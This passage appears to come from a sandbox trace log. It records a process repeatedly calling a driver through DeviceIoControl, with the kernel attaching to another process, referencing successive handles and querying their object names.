PsAcquireProcessExitSynchronization () returned 0x0 [0186.226] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.226] ObReferenceObjectByHandle (in: Handle=0x68, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001f1d4a0, HandleInformation=0x0) returned 0x0 [0186.226] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.226] PsReleaseProcessExitSynchronization () returned 0x2 [0186.226] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.226] ObQueryNameString (in: Object=0xfffffa8001f1d4a0, ObjectNameInfo=0xfffffa8003152044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003152044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.226] ObfDereferenceObject (Object=0xfffffa8001f1d4a0) returned 0x1 [0186.226] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.226] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.226] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.226] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.226] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.226] PsAcquireProcessExitSynchronization () returned 0x0 [0186.226] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.227] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001f1d3f0, HandleInformation=0x0) returned 0x0 [0186.227] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.227] PsReleaseProcessExitSynchronization () returned 0x2 [0186.227] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.227] ObQueryNameString (in: Object=0xfffffa8001f1d3f0, ObjectNameInfo=0xfffffa8003153044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003153044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.227] ObfDereferenceObject (Object=0xfffffa8001f1d3f0) returned 0x1 [0186.227] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.227] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.227] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.227] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.227] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.227] PsAcquireProcessExitSynchronization () returned 0x0 [0186.227] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.228] ObReferenceObjectByHandle (in: Handle=0x70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80028b33b0, HandleInformation=0x0) returned 0x0 [0186.228] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.228] PsReleaseProcessExitSynchronization () returned 0x2 [0186.228] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.228] ObQueryNameString (in: Object=0xfffffa80028b33b0, ObjectNameInfo=0xfffffa8003154044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003154044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.228] ObfDereferenceObject (Object=0xfffffa80028b33b0) returned 0x1 [0186.228] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.228] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.228] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.228] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.228] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.228] PsAcquireProcessExitSynchronization () returned 0x0 [0186.228] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.229] ObReferenceObjectByHandle (in: Handle=0x74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80028b3320, HandleInformation=0x0) returned 0x0 [0186.229] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.229] PsReleaseProcessExitSynchronization () returned 0x2 [0186.229] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.229] ObQueryNameString (in: Object=0xfffffa80028b3320, ObjectNameInfo=0xfffffa8003155044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003155044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.229] ObfDereferenceObject (Object=0xfffffa80028b3320) returned 0x1 [0186.229] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.229] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.229] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.229] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.229] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.229] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.229] PsAcquireProcessExitSynchronization () returned 0x0 [0186.229] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.230] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a001b67060, HandleInformation=0x0) returned 0x0 [0186.230] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.230] PsReleaseProcessExitSynchronization () returned 0x2 [0186.230] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.230] ObQueryNameString (in: Object=0xfffff8a001b67060, ObjectNameInfo=0xfffffa8003156044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003156044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.230] ObfDereferenceObject (Object=0xfffff8a001b67060) returned 0x1 [0186.230] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.230] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.230] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.230] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.230] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.230] PsAcquireProcessExitSynchronization () returned 0x0 [0186.230] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.230] ObReferenceObjectByHandle (in: Handle=0x84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002132110, HandleInformation=0x0) returned 0x0 [0186.231] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.231] PsReleaseProcessExitSynchronization () returned 0x2 [0186.231] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.231] ObQueryNameString (in: Object=0xfffffa8002132110, ObjectNameInfo=0xfffffa8003157044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003157044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.231] ObfDereferenceObject (Object=0xfffffa8002132110) returned 0x6 [0186.231] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.231] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.231] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.231] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.231] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.231] PsAcquireProcessExitSynchronization () returned 0x0 [0186.231] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.231] ObReferenceObjectByHandle (in: Handle=0x88, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80019eaf50, HandleInformation=0x0) returned 0x0 [0186.231] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.231] PsReleaseProcessExitSynchronization () returned 0x2 [0186.231] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.231] ObQueryNameString (in: Object=0xfffffa80019eaf50, ObjectNameInfo=0xfffffa8003158044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003158044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.231] ObfDereferenceObject (Object=0xfffffa80019eaf50) returned 0x3 [0186.231] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.232] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.232] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.232] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.232] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.232] PsAcquireProcessExitSynchronization () returned 0x0 [0186.232] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.232] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80019ea410, HandleInformation=0x0) returned 0x0 [0186.232] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.232] PsReleaseProcessExitSynchronization () returned 0x2 [0186.232] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.232] ObQueryNameString (in: Object=0xfffffa80019ea410, ObjectNameInfo=0xfffffa8003159044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003159044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.232] ObfDereferenceObject (Object=0xfffffa80019ea410) returned 0x2 [0186.232] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.232] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.232] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.232] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.232] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.232] PsAcquireProcessExitSynchronization () returned 0x0 [0186.232] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.233] ObReferenceObjectByHandle (in: Handle=0x90, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e864e0, HandleInformation=0x0) returned 0x0 [0186.233] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.233] PsReleaseProcessExitSynchronization () returned 0x2 [0186.233] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.233] ObQueryNameString (in: Object=0xfffffa8001e864e0, ObjectNameInfo=0xfffffa800315a044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315a044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.233] ObfDereferenceObject (Object=0xfffffa8001e864e0) returned 0x2 [0186.233] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.233] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.233] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.233] NtQueryInformationThread (in: ThreadHandle=0x0, ThreadInformationClass=0x0, ThreadInformation=0x12d508, ThreadInformationLength=0x30, ReturnLength=0x12d4b0 | out: ThreadInformation=0x12d508, ReturnLength=0x12d4b0) returned 0xc0000008 [0186.233] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.233] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.233] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.233] PsAcquireProcessExitSynchronization () returned 0x0 [0186.233] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.233] ObReferenceObjectByHandle (in: Handle=0x9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fb1140, HandleInformation=0x0) returned 0x0 [0186.233] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.233] PsReleaseProcessExitSynchronization () returned 0x2 [0186.233] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.233] ObQueryNameString (in: Object=0xfffffa8001fb1140, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.234] ObfDereferenceObject (Object=0xfffffa8001fb1140) returned 0x2 [0186.234] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.234] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.234] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.234] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.234] PsAcquireProcessExitSynchronization () returned 0x0 [0186.234] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.234] ObReferenceObjectByHandle (in: Handle=0xa0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001e86830, HandleInformation=0x0) returned 0x0 [0186.234] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.234] PsReleaseProcessExitSynchronization () returned 0x2 [0186.234] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.234] ObQueryNameString (in: Object=0xfffffa8001e86830, ObjectNameInfo=0xfffffa800315c044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315c044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.234] ObfDereferenceObject (Object=0xfffffa8001e86830) returned 0x4 [0186.234] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.234] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.234] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.234] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.234] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.235] PsAcquireProcessExitSynchronization () returned 0x0 [0186.235] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.235] ObReferenceObjectByHandle (in: Handle=0xa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa800281e130, HandleInformation=0x0) returned 0x0 [0186.235] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.235] PsReleaseProcessExitSynchronization () returned 0x2 [0186.235] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.235] ObQueryNameString (in: Object=0xfffffa800281e130, ObjectNameInfo=0xfffffa800315d044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315d044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.235] ObfDereferenceObject (Object=0xfffffa800281e130) returned 0x1 [0186.235] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.235] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.235] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.235] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.235] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.235] PsAcquireProcessExitSynchronization () returned 0x0 [0186.235] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.235] ObReferenceObjectByHandle (in: Handle=0xa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8001fc04e0, HandleInformation=0x0) returned 0x0 [0186.235] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.235] PsReleaseProcessExitSynchronization () returned 0x2 [0186.235] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.236] ObQueryNameString (in: Object=0xfffffa8001fc04e0, ObjectNameInfo=0xfffffa800315e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.236] ObfDereferenceObject (Object=0xfffffa8001fc04e0) returned 0x1 [0186.236] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.236] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.236] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.236] PsAcquireProcessExitSynchronization () returned 0x0 [0186.236] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.236] ObReferenceObjectByHandle (in: Handle=0xac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8002132060, HandleInformation=0x0) returned 0x0 [0186.236] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.236] PsReleaseProcessExitSynchronization () returned 0x2 [0186.236] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.236] ObQueryNameString (in: Object=0xfffffa8002132060, ObjectNameInfo=0xfffffa800315f044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800315f044, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.236] ObfDereferenceObject (Object=0xfffffa8002132060) returned 0x1 [0186.236] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.236] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.236] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.237] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.237] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.237] PsAcquireProcessExitSynchronization () returned 0x0 [0186.237] KeStackAttachProcess (in: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800287e060, ApcState=0xfffff88002aab5d0) [0186.237] ObReferenceObjectByHandle (in: Handle=0xb0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80019ea390, HandleInformation=0x0) returned 0x0 [0186.237] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0186.237] PsReleaseProcessExitSynchronization () returned 0x2 [0186.237] ObfDereferenceObject (Object=0xfffffa800287e060) returned 0x4b [0186.237] ObQueryNameString (in: Object=0xfffffa80019ea390, ObjectNameInfo=0xfffffa800311f2c4, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800311f2c4, ReturnLength=0xfffff88002aab550) returned 0x0 [0186.237] ObfDereferenceObject (Object=0xfffffa80019ea390) returned 0x1 [0186.237] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0186.237] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x314b40 | out: hHeap=0x2d0000) returned 1 [0186.237] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x314b40 [0186.237] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x314b40, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x314b40*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0186.237] PsLookupProcessByProcessId (in: ProcessId=0xb40, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0186.237] PsAcquireProcessExitSynchronization () returned 